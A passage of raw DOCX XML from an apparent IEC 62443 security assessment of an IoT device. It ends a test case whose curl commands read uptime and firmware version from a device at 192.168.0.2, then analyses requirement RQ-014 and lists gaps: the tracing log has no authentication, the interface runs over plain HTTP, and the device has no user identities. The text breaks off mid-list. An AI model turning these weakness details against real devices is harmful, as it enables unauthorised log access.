            </w:hyperlink>
            <w:r w:rsidRPr="006E4D50">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t xml:space="preserve"> -o TC1303_tick_pre.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="770046D9"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 xml:space="preserve">curl -s </w:t>
            </w:r>
            <w:hyperlink r:id="rId13" w:history="1">
              <w:r w:rsidRPr="006E4D50">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="EE0000"/>
                  <w:lang w:val="pt-BR"/>
                </w:rPr>
                <w:t>http://192.168.0.2/firmware/version</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="006E4D50">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t xml:space="preserve"> -o TC1303_ver_pre.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60AAD882"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 UPLOAD (install forces reboot / cold start) ---</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1540DFCD"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curl -s </w:t>
            </w:r>
            <w:hyperlink r:id="rId14" w:history="1">
              <w:r w:rsidRPr="006E4D50">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="EE0000"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>http://192.168.0.2/systemtime/systick</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="006E4D50">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -o TC1303_tick_post.json # expect: reset toward 0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74D67683"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 xml:space="preserve">curl -s </w:t>
            </w:r>
            <w:hyperlink r:id="rId15" w:history="1">
              <w:r w:rsidRPr="006E4D50">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="EE0000"/>
                  <w:lang w:val="pt-BR"/>
                </w:rPr>
                <w:t>http://192.168.0.2/firmware/version</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="006E4D50">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t xml:space="preserve"> -o TC1303_ver_post.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="628D84E3"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analyse: tick_post &lt;&lt; tick_pre; no absolute date/time on the version change</w:t>
            </w:r>
            <w:commentRangeEnd w:id="21"/>
            <w:r w:rsidRPr="006E4D50">
              <w:rPr>
                <w:rStyle w:val="Kommentarzeichen"/>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:commentReference w:id="21"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00906341" w:rsidRPr="00FD6890" w14:paraId="65D9C0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72C2B2" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75A40A3E" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="006E4D50"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tick_post &lt;&lt; tick_pre (uptime reset, SRIO-15398); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3129D5B9" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="006E4D50"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no absolute timestamp anywhere on the upload/version change; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CF8F4F2" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="006E4D50"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no RTC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00906341" w:rsidRPr="00AD4B09" w14:paraId="78CE78E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DB9FCFB" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="132B2245"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6E4D50">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>per-upload timestamp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00906341" w:rsidRPr="00EE7A74" w14:paraId="5B04946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01D6FE" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75A19F6B" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="006E4D50"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TC1303_tick_pre/post.json, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="546DC135" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="006E4D50"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TC1303_ver_pre/post.json, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1199F97B" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="006E4D50"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log-review note per NIST SP 800-115 §3.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="59BD765A" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00906341">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5472331C" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00906341">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C1F9FE6" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00906341">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24461585" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00906341">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62A44386" w14:textId="77777777" w:rsidR="00AF4451" w:rsidRDefault="00AF4451" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10114306" w14:textId="77777777" w:rsidR="00AF4451" w:rsidRDefault="00AF4451" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F0A5519" w14:textId="77777777" w:rsidR="00AF4451" w:rsidRDefault="00AF4451" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0007427F" w14:textId="77777777" w:rsidR="00AF4451" w:rsidRDefault="00AF4451" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C472949" w14:textId="77777777" w:rsidR="00AF4451" w:rsidRDefault="00AF4451" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D2761E1" w14:textId="77777777" w:rsidR="00AF4451" w:rsidRDefault="00AF4451" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C8B9960" w14:textId="77777777" w:rsidR="00AF4451" w:rsidRDefault="00AF4451" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DADC05D" w14:textId="77777777" w:rsidR="00AF4451" w:rsidRDefault="00AF4451" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F9CEAEC" w14:textId="77777777" w:rsidR="00AF4451" w:rsidRDefault="00AF4451" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02FAA2C5" w14:textId="77777777" w:rsidR="00AF4451" w:rsidRDefault="00AF4451" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D412A06" w14:textId="77777777" w:rsidR="00AF4451" w:rsidRDefault="00AF4451" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48CE70E7" w14:textId="77777777" w:rsidR="00AF4451" w:rsidRDefault="00AF4451" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BB8198D" w14:textId="77777777" w:rsidR="00AF4451" w:rsidRDefault="00AF4451" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BB68A79" w14:textId="77777777" w:rsidR="001F325F" w:rsidRDefault="001F325F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ABD8E77" w14:textId="77777777" w:rsidR="001F325F" w:rsidRDefault="001F325F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72501DF2" w14:textId="77777777" w:rsidR="001F325F" w:rsidRDefault="001F325F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="545EF53B" w14:textId="77777777" w:rsidR="001F325F" w:rsidRDefault="001F325F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02493C4D" w14:textId="5A9FB4AF" w:rsidR="009C0A46" w:rsidRPr="00F51953" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C1714F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>REQUIREMENT 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9B0FF7"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1F1E469F" w14:textId="71BFDF18" w:rsidR="00941153" w:rsidRPr="00941153" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MVO-ID: </w:t>
      </w:r>
      <w:r w:rsidR="00941153" w:rsidRPr="00941153">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ-014</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6788117C" w14:textId="6285D0F7" w:rsidR="00941153" w:rsidRPr="00941153" w:rsidRDefault="00941153">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00941153">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVO Requirement Text: The system shall restrict access to the tracing log data exclusively to demonstrating conformity further to a reasoned request from a competent national authority.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A13A613" w14:textId="26ABA47E" w:rsidR="00941153" w:rsidRPr="00941153" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">IEC 62443-4-2 CR Mapping: </w:t>
      </w:r>
      <w:r w:rsidR="00941153" w:rsidRPr="00941153">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00806F98">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">CR 1.1, CR 1.2, </w:t>
      </w:r>
      <w:r w:rsidR="00941153" w:rsidRPr="00941153">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CR 2.1, CR 3.9, CR 4.1, CR 6.1</w:t>
      </w:r>
      <w:r w:rsidR="00806F98">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (inversion)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED7138D" w14:textId="25EEDCE2" w:rsidR="00941153" w:rsidRPr="00941153" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Target Assets: </w:t>
      </w:r>
      <w:r w:rsidR="00941153" w:rsidRPr="00941153">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">I (tracing log to be access-restricted); </w:t>
      </w:r>
      <w:r w:rsidR="00AF67E3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="00941153" w:rsidRPr="00941153">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AF67E3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(IoT A</w:t>
      </w:r>
      <w:r w:rsidR="00075ED7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ccess Channel</w:t>
      </w:r>
      <w:r w:rsidR="00941153" w:rsidRPr="00941153">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C15CA3B" w14:textId="298DDF19" w:rsidR="00941153" w:rsidRPr="00941153" w:rsidRDefault="00196EB6">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00196EB6">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">STRIDE: </w:t>
      </w:r>
      <w:r w:rsidR="007F5A7B" w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00941153" w:rsidRPr="00941153">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00075ED7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(Tampering,) </w:t>
      </w:r>
      <w:r w:rsidR="00941153" w:rsidRPr="00941153">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Information Disclosure (primary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524445AB" w14:textId="77777777" w:rsidR="00A95EC4" w:rsidRPr="00FF66C8" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Function (Mitigation): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70899778" w14:textId="5CC7EB34" w:rsidR="00FF66C8" w:rsidRPr="00FF66C8" w:rsidRDefault="00FF66C8" w:rsidP="00FF66C8">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF66C8">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Error log readable via IoT-Core</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF66C8">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> No auth gate (SRIO-10662)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF66C8">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>stated as the deficiency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6984CC87" w14:textId="492646B7" w:rsidR="00FF66C8" w:rsidRPr="00FF66C8" w:rsidRDefault="00FF66C8" w:rsidP="00FF66C8">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF66C8">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IoT-Core incoming HTTP, no HTTPS (SRIO-7903/7907).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A753A7" w14:textId="605D627E" w:rsidR="00FF66C8" w:rsidRPr="00FF66C8" w:rsidRDefault="00FF66C8" w:rsidP="00FF66C8">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF66C8">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2 concurrent connections, incoming-only (SRIO-7909/7908).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2514E7BF" w14:textId="5853F64C" w:rsidR="00FF66C8" w:rsidRPr="00A95EC4" w:rsidRDefault="00FF66C8" w:rsidP="00FF66C8">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF66C8">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>No documented delete/erase command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF66C8">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Stated for completeness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4FD498" w14:textId="77777777" w:rsidR="00626A9E" w:rsidRPr="00626A9E" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Identified Gap: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C83A97C" w14:textId="53898C0F" w:rsidR="00912080" w:rsidRPr="00912080" w:rsidRDefault="00912080" w:rsidP="00912080">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00912080">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-1</w:t>
      </w:r>
      <w:r w:rsidR="003C7633">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00912080">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>There is no gate because the device has no user-identity model at all (password removed, SRIO-8299). RQ-014’s ‘restrict access exclusively to [X]’ is therefore architecturally impossible: you cannot restrict access to a party on a device that cannot identify any party. CR 2.1 fails because CR 1.1/1.2 are absent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3209C14E" w14:textId="6E8364FD" w:rsidR="00912080" w:rsidRPr="00912080" w:rsidRDefault="00912080" w:rsidP="00912080">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00912080">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00912080">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> The log is readable by anyone with segment access, not ‘exclusively’ for a competent-authority request. The only barrier is the environmental SRIO-9402 assumption, not the fine-grained, purpose-limited control RQ-014 demands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BFF430" w14:textId="614EC5CD" w:rsidR="007F5A7B" w:rsidRPr="003C7633" w:rsidRDefault="00912080" w:rsidP="003C7633">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00912080">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>G-3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
